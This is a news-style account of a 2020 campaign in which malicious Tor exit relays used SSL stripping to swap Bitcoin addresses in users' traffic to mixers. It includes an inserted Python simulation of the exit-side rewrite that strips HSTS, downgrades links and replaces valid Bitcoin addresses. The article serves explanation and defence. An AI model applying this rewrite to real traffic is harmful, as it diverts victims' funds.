Attackers replaced Bitcoin addresses in Tor Browser users' traffic on the fly in order to intercept the funds being sent.
An unknown cybercriminal group added servers to the Tor network in order to carry out an SSL stripping attack on Tor Browser users conducting cryptocurrency transactions. Their goal was to replace destination BTC addresses directly in traffic, thereby depriving their victims of digital currency.
The cybercriminals began their activity in January 2020, and by May 2020 controlled roughly a quarter of the Tor network's exit capacity (23.95%, spread across about 380 relays). Exit relays are the servers through which user traffic leaves the Tor network and enters the open Internet.
The full scope of the operation is difficult to determine, according to security researcher Nusenu, but he was able to identify almost four hundred malicious exit nodes under the attackers' control at the peak of the operation.
By manipulating traffic passing through the exit nodes they controlled, the attackers mounted a man-in-the-middle (MITM) attack on Tor Browser users. They were specifically interested in visitors to cryptocurrency-related sites.
More precisely, the criminals carried out so-called SSL stripping. The malicious exit does not break HTTPS itself; it intercepts the user's initial plaintext HTTP request to a site and keeps the session on HTTP, fetching the real page over HTTPS on the user's behalf and relaying it back unencrypted, with HTTPS links and redirects rewritten to HTTP and the site's HSTS header removed. Because the exit relay is the point where the user's traffic leaves Tor's own encryption, a session it has kept on plain HTTP can be read and modified by it at will before it goes any further. As Nusenu explained, the attackers used this to scan stripped traffic going to bitcoin mixers (services that obscure the origin of cryptocurrency transactions) for Bitcoin addresses and replace them with addresses of their own, so the cryptocurrency was redirected without its owners noticing.
The technique has a precondition worth stating: it only works when the very first request to the site is sent over plain HTTP (the user typed the domain without https:// or followed an http:// link) and the browser holds no HSTS entry, cached or preloaded, that forces HTTPS for that host. A user who confirms that the address bar shows https:// before copying a deposit address is not affected.
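The two halves of the attack described above, as a constructed simulation added here (this is not the attackers' code or anything from the article or from Nusenu's report): the response rewrite a malicious exit can apply to a session it has kept on plain HTTP (dropping HSTS, downgrading redirects and links, and swapping every checksum-valid Bitcoin address for its own), and the precondition check that decides whether the strip can even start. The mixer host name, the HTML page, the headers and both addresses are made up; the addresses are generated with the Base58Check routine in the block so that the swap only fires on addresses that actually validate, as a careful attacker would want.

```python
"""Constructed simulation of the exit-node rewrite (SSL strip + Bitcoin address swap)
and of the precondition that makes it possible. Added example code, not the attackers'
code; every address, host name and header below is invented for the demonstration."""
import hashlib
import re

# Shapes of legacy Base58Check addresses ('1...' P2PKH, '3...' P2SH) and bech32 ('bc1...').
BTC_ADDR_RE = re.compile(r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{11,71})\b")
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58check_encode(payload: bytes) -> str:
    """Base58Check: payload || first 4 bytes of SHA256(SHA256(payload)), base58-encoded."""
    raw = payload + hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    n = int.from_bytes(raw, "big")
    digits = ""
    while n:
        n, r = divmod(n, 58)
        digits = B58_ALPHABET[r] + digits
    # each leading zero byte is encoded as a leading '1'
    return "1" * (len(raw) - len(raw.lstrip(b"\x00"))) + digits


def b58check_valid(addr: str) -> bool:
    """True only if addr decodes to 25 bytes whose trailing 4-byte checksum matches."""
    n = 0
    for ch in addr:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return False
        n = n * 58 + idx
    pad = len(addr) - len(addr.lstrip("1"))
    raw = b"\x00" * pad + n.to_bytes((n.bit_length() + 7) // 8, "big")
    if len(raw) != 25:
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def exit_node_rewrite(headers: dict, body: str, attacker_addr: str):
    """Model of what a malicious exit can do to a response it relays in the clear:
    keep the user on plain HTTP and swap every valid Bitcoin address for its own."""
    out = {}
    for name, value in headers.items():
        key = name.lower()
        if key == "strict-transport-security":
            continue  # drop HSTS so the browser never learns to insist on HTTPS for this host
        if key == "location" and value.lower().startswith("https://"):
            value = "http://" + value[len("https://"):]  # keep the redirect, lose the encryption
        out[name] = value
    body = body.replace("https://", "http://")  # crude link downgrade, enough for the demo

    def swap(match):
        addr = match.group(0)
        # only swap addresses that validate; bech32 is accepted on shape alone in this demo
        if addr.startswith("bc1") or b58check_valid(addr):
            return attacker_addr
        return addr

    return out, BTC_ADDR_RE.sub(swap, body)


def attack_possible(scheme_typed: str, host: str, hsts_cache: set) -> bool:
    """SSL stripping needs a plaintext first hop: the user navigated to http://host and
    the browser holds no (cached or preloaded) HSTS entry that would force HTTPS."""
    return scheme_typed == "http" and host not in hsts_cache


# Constructed sample: a mixer's deposit page as the real server would send it over HTTPS.
MIXER_DEPOSIT_ADDR = b58check_encode(b"\x00" + hashlib.sha256(b"constructed-mixer").digest()[:20])
ATTACKER_ADDR = b58check_encode(b"\x00" + hashlib.sha256(b"constructed-attacker").digest()[:20])
MIXER_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=31536000",
}
MIXER_BODY = (
    '<a href="https://mixer.example/status">status</a>\n'
    f"<p>Send your coins to: <code>{MIXER_DEPOSIT_ADDR}</code></p>\n"
)


def demo():
    """Run the rewrite over the constructed page; returns the tampered headers and body."""
    return exit_node_rewrite(MIXER_HEADERS, MIXER_BODY, ATTACKER_ADDR)


if __name__ == "__main__":
    headers, body = demo()
    print(headers)
    print(body)
    print("HSTS survived:", "Strict-Transport-Security" in headers)
```

The checksum validation matters on both sides: an attacker who blindly rewrote every 34-character token would corrupt pages and get noticed, and a defender scanning stripped traffic for swapped addresses can use the same decode to tell a real address from noise. `attack_possible` is the user-side lesson in one line: a cached or preloaded HSTS entry, or simply starting from an https:// URL, means the exit never sees a plaintext request to downgrade.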
As a result, a Tor Browser user who tried to transfer funds from one Bitcoin wallet to another could unknowingly send them to the attackers instead.
In June 2020, the Tor network's directory authorities removed the known malicious relays, significantly weakening the attackers. Their influence was greatly reduced, but more than 10% of the network's exit capacity still remained under their control.